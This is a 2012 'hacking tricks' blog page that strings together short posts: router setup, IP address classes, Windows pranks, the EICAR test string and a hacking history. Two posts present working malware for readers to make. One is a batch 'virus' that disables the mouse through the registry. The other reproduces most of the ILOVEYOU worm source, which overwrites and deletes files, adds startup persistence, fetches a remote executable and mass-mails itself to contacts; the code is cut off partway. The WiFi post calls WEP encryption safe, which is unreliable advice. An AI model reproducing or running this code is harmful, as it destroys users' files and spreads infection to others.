Engineer Portal Search

Loading

Saturday, March 17, 2012

How To Protect Your BSNL WiFi Internet

How To Protect Your
BSNL WiFi Internet
Hi everyone, we all are under the
threat of terror as we are using
an unprotected wifi at home or at
... office.
Recently the attacks onAhmedabad city, Mumbai city
and many other Indian cities were plotted and many email treaths
were sent through unprotected wifi networks of our own.
Many innocent peoples from corporate level and individual level
were taken to police custody as the IP Address matched from the
IP Address of the treath emails sent. This was because of
unprotected wifi system. So if you are using the WiFi for
internet you need to protect it right now, to avoid any problems
that can ruin your life. Unprotected or WiFi without
proper encryption can be used by anyone coming under its range,
anyone coming under your WiFi range can use internet without
you knowing untill you get a heavy bill amounts and problems.
So I will tell you how to protect your BSNL WiFi system.
How to put username and password as well as encrption in
BSNL WiFi internet system. It's very eay, follow the following
steps:
1. First log on to
website http://192.168.1.1/
2. Enter the usrname and
password
3. By default the username and
password is admin/admin
4. Now click o the Wireless link
5. Under the Wireless link you
will see Basic link, click
on Basic link
6. Check the box Enable
Wireless
7. Enter any name you like to
in SSID and click on save/
applybutton
8. After you have done the above
steps click on Security link
9. Here under WEP
Encrptionoption, make it Enabled
10. So you will see some more
fields to be entered
11. Now Choose 128bit
security andNetwork Key 1
12. Enter your Network Key in
the first field
13. Network key should be in 13
Hexa digits i.e. (A-Z)(0-9)For
example : ABCDEFGHZRQ98,
letters are case sensitive
14. After you have entered this settings click on save/
applybutton And here you go, your BSNL WiFi network is safe and
protected.Now go to your Network Connections and search for a
wireless netwrok, you will see your name that you entered in
SSID field, click on that name enter the 13 digit key and relax
and surf the protected and problem free internet.
Hope this helps you.
  

IP ADDRESS STRUCTURE

IP ADDRESS STRUCTURE:

Note: the terms multicast address and MSB are explained at the end.

Every station on a PSN (packet switched network) that is based on the TCP/IP
protocol (your computer is one, for example. Yes, we're referring to a host
that is connected to the net) must have an IP address, so it can be identified,
and information can be relayed and routed to it in an orderly fashion.

An IP address consists of a 32 bit logical address. The address is divided
into two fields:

1) The network address:

Assigned by InterNIC (Internet Network Information Center).
In fact most ISPs (internet service providers) purchase a number of addresses
and assign them individually.

2) The host address:

An address that identifies the single nodes throughout the network. It can be assigned
by the network manager, by using protocols for it such as DHCP, or the workstation itself.

[The IP networking protocol is a logically routed protocol, meaning that address 192.43.54.2
will be on the same physical wire as address 192.43.54.3 (of course this is not always true. It depends on the

subnet mask of the network, but all of that can fill a text of its own)

IP address structure:

---.---.---.---

^ ^
| |
network | host

Every " --- " = 8 bits.
The first bits ===> network address
The last bits ===> host address.
with 8 bits you can present from 0-255 . (binary=(2 to the power of 8)-1)

Example:
11000010.01011010.00011111.01001010 (binary)
194.90.31.74 (decimal)
IP address CLASSES :
We can classify IP addreses to 5 groups. You can distinguish them by comparing the "High Order" bits (the first four bits on the
left of the address):

type | model | target | MSB |addr.range |bit number| max.stations|
| | groups | | |net./hosts| |
------|--------|--------|-----|--------------|----------|-------------|
A |N.h.h.h | ALL | 0 | 1.0.0.0 | 24/7 | 16,777,214 |
| | ACCEPT | | to | | |
| | HUGE | | 127.0.0.0 | | |
| | CORPS | | | | |
-----------------------------------------------------------------------
|N.N.h.h | TO ALL | 10 | 128.1.00 | 16/14 | 65,543 |
B | | LARGE | | to | | |
| | CORPS | | 191.254.00 | | |
-----------------------------------------------------------------------
|N.N.N.h |TO ALOT | 110 | 192.0.1.0 | 8/22 | 254 |
C | |OF | | to | | |
| |SMALL | | 223.225.254 | | |
| |CORPS | | | | |
-----------------------------------------------------------------------
D | NONE |MULTI-CA|1110 | 224.0.0.0 | NOT FOR | UNKNOWN |
| |ST ADDR.| | to | USUAL | |
| |RFC-1112| |239.255.255.255| USE | |
-----------------------------------------------------------------------
E | NOT FOR|EXPERIME|1,1,1,1| 240.0.0.0 |NOT FOR| NOT FOR USE|
| USE |NTAL | | to |USE | |
| |ADDR. | |254.255.255.255| | |
-----------------------------------------------------------------------

N=NETWORK , h=HOST .

Notice the address range 127.X.X.X.
These addresses are assigned to internal use to the network device, and are
used as an application tool only. For example: 127.0.0.1, the most common one,
is called the loopback address - everything sent here goes directly back to
you, without even traveling out on the wire.
Also, some IPs are reserved for VPNs - Virtual Private Networks. These are
local area networks over wide area networks that use the Internet Protocol to
communicate, and each computer inside the network is assigned with an IP
address. So, suppose a certain computer wants to send a data packet to
another host on the network with the IP 'x', but there's also another host on
the Internet that has the same IP - what happens now? So this is why you
cannot use these and other forms of reserved IPs on the Internet.

EXTRA:

Distinguishing different groups:

You have to compare the first byte on the left in the address as follows:

Type | First byte | MSB
| in decimal |
----------------------------
A | 1-127 | 0
----------------------------
B | 128-191 | 10
----------------------------
C | 192-223 | 110
----------------------------
D | 224-239 | 1110
----------------------------
E | 240-254 | 1111
----------------------------

NOTES: Yes, we know, we've left A LOT of things unexplained in this text.
With time, we will write more tutorials to cover these and other subjects. So
in the meantime, I suggest that you go to http://blacksun.box.sk/, find the
tutorials page and see if there's anything else that's interesting to you.
And remember - we also have a message board, so if you have any questions,
feel free to post them there.

weird shit (newbie note):

1) Multicast: (copied from RFC 1112)
IP multicasting is the transmission of an IP datagram to a "host
group", a set of zero or more hosts identified by a single IP
destination address. A multicast datagram is delivered to all
members of its destination host group with the same "best-efforts"
reliability as regular unicast IP datagrams, i.e., the datagram is
not guaranteed to arrive intact at all members of the destination
group or in the same order relative to other datagrams.

The membership of a host group is dynamic; that is, hosts may join
and leave groups at any time. There is no restriction on the
location or number of members in a host group. A host may be a
member of more than one group at a time. A host need not be a member
of a group to send datagrams to it.

A host group may be permanent or transient. A permanent group has a
well-known, administratively assigned IP address. It is the address,
not the membership of the group, that is permanent; at any time a
permanent group may have any number of members, even zero. Those IP
multicast addresses that are not reserved for permanent groups are
available for dynamic assignment to transient groups which exist only
as long as they have members.

Internetwork forwarding of IP multicast datagrams(ip packets)is handled by
"multicast routers" which may be co-resident with, or separate from,
internet gateways. A host transmits an IP multicast datagram as a
local network multicast which reaches all immediately-neighboring
members of the destination host group. If the datagram has an IP
time-to-live greater than 1, the multicast router(s) attached to the
local network take responsibility for forwarding it towards all other
networks that have members of the destination group. On those other
member networks that are reachable within the IP time-to-live, an
attached multicast router completes delivery by transmitting the
datagram(ip packet) as a local multicast.

*if you donot understand the above do not worry, it is complicated and dry
but reread it and read it again get a dictionary if it helps.
Hacking is not easy.

2) MSB: Most Significent Bit:
In set numbers the first number on the left is the most important because it
holds the highest value as opposed to the LSB=> least significent bit, it
always holds the the smallest value.
 

Facebook currently has 4 VIRUSES:

Facebook currently has 4 VIRUSES:

#1 ---If you get a notice of a PHOTO TAG ... Do not open it.

#2---If you get a notification that a friend reported you for offensive behavior etc.. Do not open it.
... ... ...
#3 Is a Video saying 99% of People can not watch this for more the 15 Sec. Do not open it is also a virus.

#4 all Messages from your friends via chat saying click this link .. Do not open! These are BAD ones and will crash... your computer ..... re-post and warn friend.

WARNING PLEASE LISTEN UP !! HACKERS ARE BUSY ON FACEBOOK AGAIN!!! 

How To Change "recycle bin" name

How To Change "recycle bin" name

1-Click Start menu > Run > and type
“regedit” (without quotes), to run
Windows Registry Editor
2- Find and go to following “HKEY_
CLASSES_ROOT/CLSID/
... {645FF040-5081-101B-9F08-00AA002F9
54E}”
3- Change the name "Recycle Bin" to
whatever you want
Please Note :Incorrectly editing the
registry may severely damage your
system.
 

How To Access Facebook Without Internet Connection

How To Access Facebook Without Internet Connection ?Yes you read it write…now you can accesss facebook ... without internet through your mobile and dont worry this service will work on any mobile , irrespective of the model. Facebook India has partnered
with Fonetwish , which was jointly developed by Singapore-based mobile solutions provider U2opia Mobile and Facebook, to bring facebook for those who are unable to accessfacebook due to unavailability
of Internet connection.It enable users to access facebook without having a GPRS connection on their phones.This service is based on menu-based USSDtechnology (Unstructured Supplementary Data), which is used by the mobile service providers to inform users about balance after a call, miss call alerts etc.Instead of using a regular browser, the USSD menu acts as browser to extract content to the
phone. All you need is to dial *325# ( “*fbk#” for non-qwerty mobile handsets) and wait for the login page. After that just enter your log in details,i.e your username and iPhone users enter your e- mail, and sign in to your account.You can then send number based commands to access various features of
facebook. So what all can you do with this service: Read,Like and Comment
on news feed Update Status Post on others wall Send receive friend requests Send/Read messages Chat with friends Check notifications and
much more… The best thing is you are getting all these features at
a very low cost.Its subscription cost is 1.00 per day for unlimited usage of
this service.Currently this service is available for Airtel, Aircel, Idea and Docomo users.In India the use of internet on mobiles is still limited to key cities and due
to which many users are excluded from accessing facebook via mobile phones,
but now because of this service everyone with a mobile phone can enjoy
Facebooking.
 

Facebook Shortcuts for chrome

Facebook Shortcuts for chrome

Today, I have brought a great shortcuts of facebook for all facebook geeks and lovers. So must like it:-

Alt+1— View Home Page(News feed)
Alt+2— View Profile page
Alt+3— Accepts or Decline friendship request
Alt+4— Open Message Page
Alt+5— Open Notification Bar
Alt+6— View Account Settings
Alt+7— View privacy Settings
Alt+8— View facebook fan Page
Alt+9— Read the facebook terms of Service agreement
Alt+M— Send new message, Opens the facebook new message inbox
Alt+/— Move cursor to search box
 

Find out your own mobile number

Find out your own mobile number :

Type the code(below) on your mobile screen a you will see your mobile number

Airtel - *141*123#
Aircel - *888# 
Docomo - *1#
Idea - *789#
Reliance - *1#
Videocon - *1#
Virgin - *1#
Vodafone - *555*0#
 

Hacking History...

Hacking History...

From phone phreaks to Web attacks, hacking has been a part of computing for 40 years.

1960's
The Dawn of Hacking
The first computer hackers emerged at MIT. They borrow their name from a term to describe members of a model train group at the school who "hack" the electric trains, tracks, and switches to make them perform faster and differently. A few of the members transfer their curiosity and rigging skills to the new mainframe computing systems being studied and developed on campus.

1980's
Hacker Message Boards and Groups
Phone phreaks begin to move into the realm of computer hacking, and the first electronic bulletin board systems (BBSs) spring up. The precursor to Usenet newsgroups and e-mail, the boards--with names such as Sherwood Forest and Catch-22--become the venue of choice for phreaks and hackers to gossip, trade tips,
and share stolen computer passwords and credit card numbers.

1988
The Morris Worm
Robert T. Morris, Jr., a graduate student at Cornell University and son of a chief scientist at a division of the National Security Agency, launches a self-replicating worm on the government's ARPAnet (precursor to the Internet) to test its effect on UNIX systems. The worm gets out of hand and spreads to some 6000 networked computers, clogging government and university systems. Morris is dismissed from Cornell, sentenced to three years' probation, and fined $10,000.

1995
The Mitnick Takedown
Serial cybertrespasser Kevin Mitnick is captured by federal agents and charged with stealing 20,000 credit card numbers. He's kept in prison for four years without a trial and becomes a cause célèbre in the hacking underground. After pleading guilty to seven charges at his trial in March 1999, he's eventually sentenced to little more than the time he had already served while he awaited a trial. Russian crackers siphon $10 million from Citibank and transfer the money to bank accounts around the world. Vladimir Levin, the 30-year-old ringleader, uses his work laptop after hours to
transfer the funds to accounts in Finland and Israel.Levin stands trial in the United States and is sentenced to three years in prison. Authorities recover all but $400,000 of the stolen money.

1998
The Cult of Hacking and the Israeli Connection
The hacking group Cult of the Dead Cow releases its Trojan horse program, Back Orifice--a powerful hacking tool--at Def Con. Once a hacker installs the Trojan horse on a machine running Windows 95 or Windows 98, the program allows unauthorized remote access of the machine.

2000
Service Denied
In one of the biggest denial-of-service attacks to date, hackers launch attacks against eBay, Yahoo, Amazon, and others. Activists in Pakistan and the Middle East deface Web sites belonging to the Indian and Israeli governments to protest oppression in Kashmir and Palestine.

2001
DNS Attack
Microsoft becomes the prominent victim of a new type of hack that attacks the domain name server. In these denial-of-service attacks, the DNS paths that take users to Microsoft's Web sites are corrupted. The hack is detected within a few hours, but prevents millions of users from reaching Microsoft Web pages for two days.

2011 high profile hack attacks

6 June - Nintendo hit by Lulz Security
5 June - Sony Pictures Russia database leaked
3 June - Sony Europe database leaked
3 June - 10,000 Iranian government e-mails stolen by Anonymous
2 June - Sony Pictures database leaked
1 June - Defence group L-3 discloses it was hit in attack
1 June - Google reveals Gmail attack
30 May - Fake story about Tupac posted to PBS website
29 May - Honda Canada reveals 283,000 records stolen
27 May - Lockheed Martin reveals it has been hit by a hack attack
24 May - Sony Music Japan hacked
19 May - Nasa loses data to TinKode

Top 5 Most Famous Hackers of All Time

1. Jonathan James: James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at the age of 16 . In an anonymous PBS interview, he professes, "I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off." James also cracked into NASA computers, stealing software worth approximately $1.7 million.

2. Adrian Lamo: Lamo's claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the "homeless hacker," he used Internet connections at Kinko's, coffee shops and libraries to make his intrusions. In a profile article, "He Hacks by Day, Squats by Night," Lamo reflects, "I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional."

3. Kevin Mitnick: A self-proclaimed "hacker poster boy," Mitnick went through a highly
publicized pursuit by authorities. His mischief was hyped by the media but his actual
offenses may be less notable than his notoriety suggests. The Department of Justice
describes him as "the most wanted computer criminal in United States history." His
exploits were detailed in two movies: Freedom Downtime and Takedown.

4. Kevin Poulsen: Also known as Dark Dante, he gained recognition for his hack of LA
radio's KIIS-FM phone lines, which earned him a brand new Porsche, among other items. His hacking specialty, however, revolved around telephones.

5. Robert Tappan Morris: Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.
 

Is your computer male or female


Is your computer male or female




This is funny trick that let you know the gender of your computer whether it is male or female. So let get started.
• Open Notepad and paste the following codes.
CreateObject("SAPI.SpVoice").Speak"i love you"
• Save the file as gender.vbs
• Now, open the save file
• If you hear male voice then your computer is male and if you hear female voice then its female.


Matrix Effect using notepad

Matrix Effect using notepad



This is amazing notepad trick which will display matrix effect like you might have seen in movies, that is numbers flashes in green colour. Basically we will be creating a small batch file in notepad.
• Go to Notepad and copy below codes
@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start
• Save this file as matrix.bat
• Now open this file as see matrix effect on your screen.
 

Make your computer talk what you type !

Make your computer talk what you type !


This is very good and interesting javascript trick which let your computer speaks whatever you type. There is no requirement of any software. Just follow below simple steps.
• First open Notepad and copy below codes
Dim message, sapi
message=InputBox("What do you want me to say?","COOL HACKING TRICKS")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
• Now save the notepad file as talk.vbs
• Now close the notepad file and open it again.
• Done !!! 

Is you antivirus working perfect ?

Is you antivirus working perfect ?



This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.
• First open Notepad and copy below code into it.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
• Save the file as virus.exe
As soon as you will run this file you antivirus will detect it as software. If not then you need to change your program. 

100+ Run commands List

100+ Run commands List

• Accessibility Options : access.cpl
• Add Hardware : hdwwiz.cpl
• Add / Remove Programs : appwiz.cpl
• Administrative Tools : control admintools
• Automatic Updates : wuaucpl.cpl
• Wizard file transfer Bluethooth : fsquirt
• Calculator : calc
• Certificate Manager : certmgr.msc
• Character : charmap
• Checking disk : chkdsk
• Manager of the album (clipboard) : clipbrd
• Command Prompt : cmd
• Service components (DCOM) : dcomcnfg
• Computer Management : compmgmt.msc
• DDE active sharing : ddeshare
• Device Manager : devmgmt.msc
• DirectX Control Panel (if installed) : directx.cpl
• DirectX Diagnostic Utility : dxdiag
• Disk Cleanup : cleanmgr
• System Information : dxdiag
• Disk Defragmenter : dfrg.msc
• Disk Management : diskmgmt.msc
• Partition manager : diskpart
• Display Properties : control desktop
• Properties of the display (2) : desk.cpl
• Properties display (tab "appearance") : control color
• Dr. Watson : drwtsn32
• Manager vérirficateur drivers : check
• Event Viewer : Eventvwr.msc
• Verification of signatures of files : sigverif
• Findfast (if present) : findfast.cpl
• Folder Options : control folders
• Fonts (fonts) : control fonts
• Fonts folder windows : fonts
• Free Cell : freecell
• Game Controllers : Joy.cpl
• Group Policy (XP Pro) : gpedit.msc
• Hearts (card game) : mshearts
• IExpress (file generator. Cab) : IExpress
• Indexing Service (if not disabled) : ciadv.msc
• Internet Properties : inetcpl.cpl
• IPConfig (display configuration) : ipconfig / all
• IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
• IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
• IPConfig (IP configuration cancels maps) : ipconfig / release
• IPConfig (renew IP configuration maps) : ipconfig / renew
• Java Control Panel (if present) : jpicpl32.cpl
• Java Control Panel (if present) : javaws
• Keyboard Properties : control keyboard
• Local Security Settings : secpol.msc
• Local Users and Groups : lusrmgr.msc
• Logout : logoff
• Microsoft Chat : winchat
• Minesweeper (game) : winmine
• Properties of the mouse : control mouse
• Properties of the mouse (2) : main.cpl
• Network Connections : control NetConnect
• Network Connections (2) : ncpa.cpl
• Network configuration wizard : netsetup.cpl
• Notepad : notepad
• NView Desktop Manager (if installed) : nvtuicpl.cpl
• Manager links : packager
• Data Source Administrator ODBC : odbccp32.cpl
• Screen Keyboard : OSK
• AC3 Filter (if installed) : ac3filter.cpl
• Password manager (if present) : Password.cpl
• Monitor performance : perfmon.msc
• Monitor performance (2) : perfmon
• Dialing Properties (phone) : telephon.cpl
• Power Options : powercfg.cpl
• Printers and Faxes : control printers
• Private Character Editor : eudcedit
• Quicktime (if installed) : QuickTime.cpl
• Regional and Language Options : intl.cpl
• Editor of the registry : regedit
• Remote desktop connection : mstsc
• Removable Storage : ntmsmgr.msc
• requests the operator to removable storage : ntmsoprq.msc
• RSoP (traduction. ..) (XP Pro) : rsop.msc
• Scanners and Cameras : sticpl.cpl
• Scheduled Tasks : control schedtasks
• Security Center : wscui.cpl
• Console management services : services.msc
• shared folders : fsmgmt.msc
• Turn off windows : shutdown
• Sounds and Audio Devices : mmsys.cpl
• Spider (card game) : spider
• Client Network Utility SQL server : cliconfg
• System Configuration Editor : sysedit
• System Configuration Utility : msconfig
• System File Checker (SFC =) (Scan Now) : sfc / scannow
• SFC (Scan next startup) : sfc / scanonce
• SFC (Scan each démarraget) : sfc / scanboot
• SFC (back to default settings) : sfc / revert
• SFC (purge cache files) : sfc / purgecache
• SFC (define size CAHC x) : sfc / cachesize = x
• System Properties : sysdm.cpl
• Task Manager : taskmgr
• Telnet client : telnet
• User Accounts : nusrmgr.cpl
• Utility Manager (Magnifier, etc) : utilman
• Windows firewall (XP SP2) : firewall.cpl
• Microsoft Magnifier : magnify
• Windows Management Infrastructure : wmimgmt.msc
• Protection of the accounts database : syskey
• Windows update : wupdmgr
• Introducing Windows XP (if not erased) : tourstart
• Wordpad : write
• Date and Time Properties : timedate.cpl
 

Make a virus that disable Mouse

Make a virus that disable Mouse



I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.
• Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

• Save this file as virus.bat
• Done you just created your virus.
 

Open CD/DVD Rom From Desktop

Open CD/DVD Rom From Desktop



This is simple script that let you open your CD/DVD Rom directly from your desktop. Follow below steps to do this :
• Open Notepad and copy below codes in to it.


Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

• Save the file as ejectcd.vbs and you will similar icon as below

• Double click this saved file and it will eject you cd rom.
• To stop this script go to Task manager > Process and search for wscript.exe and click on END Process as shown in below image.
 

Keyboard Dancing Led Light Trick

Keyboard Dancing Led Light Trick

Today i will be showing you an interesting trick which will let your keyboard led light to dance. Basicly we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started.

How to do that ?

1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop



2. Then save this file as led.vbs (.vbs is must)

3. Open your save file and see your keyboard led blinking like disco lights.



How to disable blinking Led ?

1. First open Task Manager [ctrl+alt+del ]
2. Then Go to process tab.
3. Select wscript.exe
4. Click on End process.
 

Making The I LOVE YOU Virus !!! virus making

Making The I LOVE YOU Virus !!!
Hey Friendz... wanna make a demolishing virus ?
then follow the steps.
open notepad.
paste the below program in notepad

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com/"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
